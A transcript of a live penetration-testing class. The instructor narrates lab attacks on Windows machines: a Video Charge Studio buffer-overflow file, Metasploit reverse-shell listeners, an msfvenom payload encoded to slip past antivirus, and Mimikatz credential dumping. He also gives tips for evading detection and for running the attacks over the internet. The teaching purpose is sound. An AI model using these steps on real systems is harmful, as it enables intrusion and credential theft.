logged in. Hello. There is an application inside that. This is what you must try. Even in the real life pen test, this is quite common, right? Don't go with the mindset of black hat hacker. You are a professional pen tester here. You must check all ins and outs. Your goal is not always about gaining access destruction. Your goal is to identify multiple ways in which someone can gain access. Hello, are you understanding? So only that thing will help you in figuring out the perfect way to configure the services in a secure fashion. I hope everyone got the idea. All right. Anyhow, you can set up your own targets and do the practice. You'll have few advantages if you have target in hand. If not, if you are going with iLab practicals, as I told you, it is not that flexible. You can only do the practicals that are there in the iLabs, right? Of course, that is more than enough for the course. But if you want to go beyond this and practice the skill, then I highly recommend you to set up your own lab, right? Again, Google. Google is the standard source for any kind of question that you have. You need to learn at least one new thing on daily basis, right? No one can become expert in cybersecurity domain, right? There is no way someone can say that I am expert. So even though you are expert, the one that you are thorough in, I mean the domain that you are expert in, right, is really good at your organization. Other areas are badly configured using which someone can enter. Are you understanding? So this is a constant process, never-ending process of learning. So with that thing said, let's move on to the last set of practicals. So before I move on to the next practical, I just want to confirm, my dear friends, is it clear up until this point? Good. So please do confirm this. If you want me to continue with the next one, please drop N in the chat. I'm extremely sorry. Today I want to skip the break because we are going to leave early. Am I right? Is that okay for all of you?
Sir, small request. Can we wind up by 4 o'clock?
4 o'clock?
Yeah.
Then I must make an agreement with you. No break, okay?
Yeah, I think that would mean because
if you say no break, then I can manage to wind up at 4 o'clock. Okay.
Yeah.
How about others? Others are not talking.
No, everyone is giving a thumbs up.
Okay. I'm not able to see all the thumbs ups. Right. Fine. Great. All right. Very good. Okay, then let's move on to the next one. This time I'm going to exploit active let's do one more practical on the same Windows 10 mission. Right? I just restarted the mission because you all know we did a lot of things on this Windows and we may not get the success for the next practical. That is the reason why I restarted it. All right. This time yet another client side exploit, right? Now that you know how to exploit client side vulnerabilities, right? This is going to act as a revision part. The process remains same as what we did for Office Word, but here I'm gonna do it on an application that is vulnerable and installed on the target. It is Video Charge Studio, right? This is a practical that is picked from your iLabs platform. You already have this video charge thing installed on one of the targets there, so you can exploit it. So I don't know whether this video charge is installed here or not. Anyhow, I have that thing here. Let's install. Hello, where is this? So in the meanwhile, okay, it is already installed. So let's search for this exploit on Metasploit, MSF console, -Q. Search Video Charge Studio or Video Charge. So this is a buffer overflow vulnerability. As mentioned on day 1, I don't know whether you remember it or not. Most of these vulnerabilities that you see in real life environment, the current situations with the latest operating systems, are related to bad memory management. So this one is the best example to demonstrate it. So this particular software don't know how to properly manage memory, right? Using which you can perform buffer overflow. We'll talk about more buffer overflows in the last session, day 5, and take advantage of that buffer overflow to execute our MetaBitter payload to get a reverse connection. So just as a revision, just as a revision, let's see what are the options that are present as part of this module. There is only one option. Now, can you tell me what kind of exploit is this? What kind of attack you can perform? Refer to your notes. What kind of exploit is this? Pardon?
Client side.
Very good. Client side. Someone else? Hello. Are you all there? Are you feeling sleepy?
Yeah, it is. It's a remote exploit with the client side.
Very good. It is remote exploit. I think you people are messaging me. Okay. Right. Very good. So it is a remote exploit and it is a client side attack, right? Client side attack, remote exploit. Is it clear? So what are the reasons you're not seeing SRV host, SRV port? If you're not seeing SRV host, SRV port, what is the thing that you must do? You must actually start the listener or else server on your own computer, and it is your headache to share this malicious payload with the target. If you're not seeing SRV host, SRV port, okay? There is no R host, R port, means this is not at all a remote attack. I mean, you cannot directly connect to the target and perform this attack there. I mean, server side attack. It is not at all a server side attack. So two things that this particular option section is telling us. I'm repeating it again. As there is no SRV host, SRV port, there is no way that this exploit is going to start its own server to share this file. Second thing, it is not there with R host, R port, so it is not a server side attack that you can perform. So this is a pure client side attack once again. What is this module going to do? This module exploits the stack-based buffer overflow on Video Charge Studio 2.12.3.685. You can actually go on Google and download this software onto your Windows and then try this, right? So this vulnerability could exploit by a remote attacker to execute arbitrary code on your target device. And this particular module is going to create a .vsc file. Only if the target opens this malicious .vsc file, you will get a reverse connection, or you will trigger that payload or the Meterpreter payload that you have injected. Done? Got it? So let's move on. I'm gonna load this particular module. What is the module ID? Or else let's load it using use exploit, Meterpreter, Windows, options. We have Meterpreter payload already configured. We are going to accept that. Again, if you want to change it, then it is better you can change it, right? You can also take a shell payload that is more convenient when compared with this Meterpreter payload. So detection rate for Meterpreter is high, right? When compared with normal shell payload. So it is better you can go with shell payload. At times, Meterpreter payload can be a reason where the attack will clash. Exploit will crash and you will not get the reverse connection. So go think about simple things first and then move on to complex things. This is the key rule, right? So tough exam doesn't mean that there are very complex exploits. Okay. So let us change the name. You can change the name or you can leave it as it is, like MSF VSC, right? And the payload options are also correct. So without wasting time, exploit. Even this exploit didn't mention that I started the reverse handler, right? This is a clear indication that this exploit is just for creating malicious documents, right? Third step is a manual step. We are done with step 1. Again, the same repeated process. You can move this thing onto the target for, pardon? Yes, Mr. Afzal, I think you are saying
just
something.
got unmuted, sir. Nothing.
Okay, no problem. It is stored in this location. Let's move this module onto my current location, which is desktop. I am going to start Python server -m http.server. And one more thing to note, if you want to perform this over WAN level, you can do all these practicals over WAN level, right? Wherever you are specifying LAN level IP address, private IP address, replace them with public IP address. That's it. Right? There is no other difference. Exploit options, everything is common. Instead of private IP address, set public IP address. If you're using ngrok, as I mentioned in the last class, you can specify ngrok domain name or ping that ngrok domain, get that IP and set that IP address. Right? Wherever you see that public IP, private IP, replace that private IP with this public IP. That's it. Then the actual practical becomes WAN level. You can execute that on anyone who is connected over internet. Don't ask me what to do if they are not connected to internet. Right? So let's download this payload onto the target. Again, this is a big challenge for me. What is my IP address? 192.168.0.226. Am I right? I think so. On port 8000. msf.psc, save file, close file. If I open this file, nothing will happen now. I'm going to start the listener. The third step, I'm going a little bit quick because you already know these steps. We already spent a lot of time in the previous practical regarding the same. You can run previous. Okay, there is no previous module. Let me load it again. Use exploit multi-handler. I hope you all have these steps in your running notes. set payload Windows meter reverse underscore TCP. Set L host 192.168.0.226 and set L port 4444. This is very important. You must set the same exact options that you configured on step 1 of this practical again in step 3. If they change, obviously payload will not know where to come. In fact, it know where to come, but you are not on that particular door. You ordered something on Amazon and gave someone's address, right? And you are waiting at your door. It will never ever reach your location. So exploit. So I can leave it with exploit or exploit-j. Run this particular software. You already got the meter. You know what to do from here. Any client side attack that you are going to do will have the similar kind of steps. Okay. I can also know how many users logged in. I think we connected to the target device using FTP. I think even that one is also counted here. Interesting. All right, so all post exploitation steps from here on remain same. All right, so any questions? I think I'm not giving you a chance to ask questions, or else I'm not allowing you to speak. Yes or no? You can feel free to speak. So is everything clear up until this point?
Yeah. You're going on a correct moderate speed so that.
Then it's okay, fine. Thank you for your feedback. Oh, Sinu ma'am is also there. Hello, ma'am.
Yes, Jayant, I am there. They have to practice. That's the only way.
Yes. That I already told them the actual technique, so they can catch up that. And without wasting time, let's move on to the Active Directory thing. Just not to confuse this particular step with a bunch of different missions in my network. I just want to use 2 different devices, right? So in fact, I used to go with Active Directory in detail in other courses which are specially meant for Active Directory, but for CPENT, you need to concentrate only on the exploitation part. So I'm not going to go with any kind of setup and all. You all have all this setup on on your iLabs platform, so you can directly practice it there. Right? If you want to set up Google, right? You can easily do that. Bad thing is I keep on changing these passwords and I will never ever remember them. Oh, good. Got it. So I have 2 computers here. One is domain controller. This is the one I was talking about before lunch. So this is a centralized control, right, which holds all different details related to the users, groups, computers, right, on this particular domain. So I'm going to log into the domain controller. So in general, this domain controller cannot be accessed directly. Why someone will place this on an exposed internet? No, they are not going to do that. But if you can manage to gain access to this client mission, this particular client is connected to this domain controller. if you can gain access to this domain, this particular computer, elevate your privileges, exact same steps that I explained before, right? You can perform enumeration and find out where this domain controller is. If you know where domain controller is, right, using this domain user credentials, you can directly connect to this domain controller. Of course, I made it simple for you to understand, but there are so many things that are part of Active Directory, which are out of scope for this course. You don't need to worry about that. Please remember the techniques that I've explained you before in the previous practical. So even if you are planning to write CPENT exam, you must know which mission you are gaining access to because of what vulnerability. What are the pre-exploitation steps that can help you in performing more interesting tasks? So to enumerate the domain, you can go with the basic commands that as you see on the screen. These are all basic Windows commands to know how many users are there, how many domain users are there, what kind of domain related groups, right? And most importantly, you can see what are the rights that these users are provided with. If the user that you gained access to is a domain administrator, again, you are lucky. Why? This domain administrator can log into any mission, even their domain controller directly. If he is not a domain administrator, what is the other possibility? It is quite common that administrators set the local administrator password same for all other devices. If you can crack the password, administrator password for this device, local administrator password for this device, there is no surprise that the same exact password works on domain controller also. These are all simple misconfigurations. I'm telling you, simple misconfigurations, right? That will make the job of attacker simple. As a pen tester, you must take that responsibility of thinking as an attacker and then figure out how someone can exploit it so that you can get a fix. I think with the practicals that we did as part of today's session, I already gave you that seed of how to think about defenses. If the practical is failing, I mean, exploit is failing, you must not feel bad. You must feel so happy because the system is secure, right? So you're not a black hat hacker to feel bad about exploit that is failing. You must feel so good because you did a great job, right? Defending the attacks in your network. So let's take a different approach to gain access to this computer. Of course, you can apply all those eternal blue or blue keep or any kind of client side attack, right, on these devices. So as I've covered all those things, let's use MSF Venom. Right? I think you already know how to use MSF Venom, so let's not waste much time there. So same as what we did for Office Word and Video Charge, MSF Venom related steps remain same. Please differentiate everything that you are using. MSF Venom is different from MSF Console, right? MSF Venom is used for creating malicious payloads. You can create a web shell, you can create a normal executable for Linux or PowerShell executable, or you can create a Windows executable exe file. Let's create a Windows executable now to gain access to this particular mission. One of the important steps or else difficulties that we'll face while creating some client side or getting success for client side attacks is defenses. Again, antivirus this time. We know how to handle firewall, but antivirus is again a big headache. But don't worry. Most of the antiviruses are going to work based on signature based detection. I think you already know all these concepts from the malwares chapter of CEH. So bypassing signature based detection is very simple by encoding your payload. MSF Venom encoders will do a great job. But people face this problem when they are handling reverse connections. You will encode the payload, very good. But if you are creating a reverse payload, That too, a what we call staged payload. So far we used meterpreter Windows reverse_TCP slash Windows slash meterpreter slash reverse_TCP. So that is a staged payload. What I told you, staged payload means a initial code will be injected onto the target, and that particular thing will take this to the next level. I mean, initial payload will establish a connection with the attacker, and after establishing connection, it will start pushing even more code onto the target. So let's take advantage of creating that MSF Venom staged payload. Windows meterpreter reverse_TCP lhost lport. Obviously, lhost is nothing but attacker's IP address, which is 226 in my case. Oh, what's happening? MSF Venom -P Windows meterpreter reverse_TCP, right? Set lhost is equal to 192.168.0.226. lport is equal to, let us set 3535, right? And this time I'm going to use encoders. As I'm using encoders, I must first list and get all the encoders. So MSF Venom hyphen list is equal to encoders. Is going to list all the encoders. I don't know whether it is equal to encoders, or else I think it works either way. Very good. So there are so many encoders that you can use on encoding this payload, or you can also take advantage of Metasploit encode evasion module for creating payloads that can bypass Windows Defender. That is according to theory, but in the reality it is different, right? It may or may not bypass. So I'm going to copy this Shikata Gani, which is one of the most popular one. Even if you observe MS08067 uses this particular encoder. So let's set this encoder with number of iterations as 5 iterations. Create exe file and let me name it as winwin.exe. You can name it whatever you want. Again, you need to build a proper story to convince your target to run. We already discussed a lot about that, so I'm not gonna bring that story again. So let me save this onto my desktop so that it will be easy for me to wipe off all these content after the session. Very good. This is step 1 process. So step 2 is to share this file. We have that payload ready. And now I'm gonna share this payload with the target. The repeated process, desktop, Python -m http.server. Right, we started going on to the target. So this time, please make sure that you use a different browser, because if you use Edge, Edge will immediately detect this. Who told that? Default softwares are not that good. I will show you what happens with Edge. Hello. It immediately detected. Even after using encoder. This is why I say it is all according to theory. You must experiment. Why? Because everyone know that you can use this encoder. One of the extremely bad habit that people have is to upload this onto this popular website. You know what is that popular website? Hello?
VirusTotal.
So once you upload it onto VirusTotal, for VirusTotal, it is just a business, right? They are giving you the service free of cost. They are going to sell the signatures to antivirus company. The moment you feel like, yay, I did a great job encoding my payload and upload it here, right? They have the copy. They shared it with antivirus companies and all different products that are using some kind of detection. Know that you did it 5 iterations of a Shikata Gani to send this payload. This is where it is kind of time consuming process. I'm not saying that it is not always possible for this browser to detect. If you can tweak this code a little bit, there are exploits that you can use. In fact, instead of executables, you can go with PowerShell scripts, because scripts are less detected, right? When compared with these softwares. Oh, I don't have Firefox. Oh, then it becomes difficult. Else let me try if I can manage to make this thing work. Please don't delete here. I must immediately move this from that location. Right? I'm going to run this as administrator, or else you can directly go and run this as a client, and you know privilege escalation technique. So FOD helper thing works here also. You can do that. Just to cut down the complexity, I'm running it as administrator so that we'll have administrator access. So it is not running it as administrator. How about running it as a normal user? More information, run it anyway. Okay, very good. It is working. So it is our turn to start the listener to handle the connection. This time I'm going to change options in the listener. So this is one last practical for this session. And after this, we'll see you again next week. So use exploit multi-handler. And I'm going to set payload as Windows meter reverse underscore TCP. Right? So show options, set lhost to this machine IP address 192.168.0.226. You can also do it with ETH0. And set L port value to 3535. Please don't delete. Okay. Before running exploit, this is a staged payload, right? So after sending the initial portion of this payload, stage 0 code, we call it as stage 0 code, right? We'll get a connection. But from there onwards, it must inject few more executables so that you can get matter bitter onto your computer. So the payload that we shared is encoded. That's okay, fine. But when you are starting a listener for listening, you must take advantage of using advanced options to enable stage encoding, because after having the reverse connection, right, you may inject few more codes. For example, we executed the GUID script before. So it means you are injecting few other instructions onto the target, right? So for performing all those things and keep that particular operation hidden, you need to encode those particular things too. To do that, I'm going to set advanced options. Please note down, enable stage encoding true. And you need to set the stage encoder. It's not compulsory that you must use the same exact encoder. So encoder, stage encoder. You can use the same exact encoder that we used here, or you can use something else, right? So there is no relation here. And exploit -J. And one more thing. In fact, the reverse connections, when you receive the first matter bit connection, the listener will die, right? So if you want this listener to run even after the first matter bit connection, you can enable what we call set. Let me verify options. So options. So show advanced. These are all options in the advanced section. Yes, set exit on session false. Right? So I don't want to exit after the very first one MetaBitter session that I received, because I shared this payload with n number of users. I want to handle connections from all those users. So then you need to set this option to false. Exploit -J. And I'm going to run this payload. Yeah, metar. Right? So now if I do get UID, you can see I am not a normal user. I'm a domain user, hacker school domain, under which I am Alan as a user. When you face a domain client, there is a too good module that you can load in MetaBitter, which is Mimikatz. Mimikatz can do the post exploitation activity for Active Directory environment. So you can dump all the domain related credentials using this Mimikatz. To load Mimikatz, you can actually use load kiwi as a command. This will load Mimikatz. Once you have Mimikatz, you can execute all the additional commands. So up until this particular point, we'll see all the commands without loading kiwi. And these are all commands that you can execute after loading kiwi. Now I can dump LSA content, SAM content, which actually holds all the credentials. So are you observing that we are not running as a system? So there is no way that you can use this module. You can only gain access. You can only run these modules if you are a system user. Anyhow, you know how to do privilege escalation. So just to simplify the process, let me run this as administrator once again. I will get one more MetaBitter session. Why? Why? Because this job is still running. Because of which option? Which option?
Exit on session.
Very good. Very good. You are correct. It is because of exit on session to false. So we have one more session. So let us take that particular session and load kiwi once again. So sysinfo get UID, right? Let's see if I can run LSA dump. So let's migrate. Migrate to any of the system process. So I always search for search indexer. or explorer.exe. These are all processes that will run on the target computer, right? And they are not temporary processes, because even in the system process, you will see few processes are temporary. Hope for the best. Metropolitan session dead. I think there is no other way. We must load that the module that I've showed you before to elevate the privileges. All right. Can do sessions. There is one session. Let me quickly go with the steps and see if we can make it through this. Oh, what is the IP address?
Localhost set as
Yes. Even I am looking at the same. Set lhost to ETH0 exploit. Failed to bind 4444. I think we used the same exact port before. That is the reason why it was throwing that warning. This privilege escalation must work on this device. Anyhow, may or may not. A quick reboot may work. Session 1 also closed. We lost the connection. I think my Kali Linux disconnected from the network. Yes, that's the problem. Oh, now the IP address changed. Anyhow, you got the idea. The major thing that I want to cover is these options. Don't worry, we'll try to continue with this again next week. Okay. So instead of rushing with the content, it is better we cover that next week. So the options that I discussed are very important. Please note down those options, and we'll talk about a bunch of other activities in the next session. All right. As I promised, and you agreed for not having a break, I must respect that, right? Okay, then we have one thing to cover there, mimic ads and how we can elevate the privilege. So we'll talk about that in the next session. And from there, we'll move on to the actual portion, which is all about pivoting and double pivoting. The next session is going to be very interesting and very important. So please make sure that you are not going to miss that particular portion, right? So before you join me on that session, I just want to confirm that, my dear friends, I already added the slides for the remaining portion, right? So there is the content related to perimeter pen testing also. Again, the same thing. what I did is instead of opening slides, which is going to waste our time, I explained them during the practical itself. Okay. Anyhow, the slides will be uploaded onto the LMS. You can go there and access those slides and look at different things that I've added onto the slide for perimeter pen testing. And next week we'll do that pivoting thing. I already have slides in pivoting part, but because of the reason why we are wrapping up a little bit early, it is not possible for me to proceed with that. No worries. No, I don't want to rush with the content. I just want to make sure that you all are thorough with the concept. I hope you all enjoyed today's session. Thank you. Thank you so much. Thank you so much for bearing me.
Thank you, sir.
A lot.
Thank you so much, Mr. Devender.
Thank you, sir.
Jayant, can you also upload the doc report that you were preparing yesterday? The template?
Okay, fine. I'll do that. So I will upload the template.
Yeah.
Is that okay?
Thank you.
I will upload the template. I will share that with the organizers, and it will be there on LMS.
Thank you.
So do practice the things that we did in the last class. And if you have time, you can do that exploitation on HSV box this week, right? So see if you can find some vulnerable services, apply the techniques that I've explained. And if I'm not wrong, you will be able to gain root access onto that mission, right? Using the same exact concepts. So I already covered the port knocking thing, how to open SSH port, right? So you can practice all those things on that box. And if you already have access to iLabs, you can do the practicals in the iLabs too, right? But please note that the things that are there in the iLab will be slightly different from the content that I'm covering in the class, right? So iLabs will go with the practical pattern, like 1, 2, 3, 4 practicals. I feel like it is better to take you one step ahead than that, which will help you even if you are planning to write exam. So please make sure that you cover both the things that I cover in the class, and also from the the practicals that are there in the iLabs. All right. That's it. Thank you so much for joining me on this session, and we'll see you in the next week with day 4 session. And there we will be doing pivoting and web applications. So if possible, we'll complete web applications. I think we will be completing web applications there itself, pivoting with web application, and a small portion of Active Directory thing, right? So that will be the schedule for the next session. So please don't miss out on that. That's it. Until I see you next week, this is Jayant signing off. Ta-da, bye-bye, see you.
Thank you, sir.
Thank you, sir. Bye.
Thank you, bye-bye.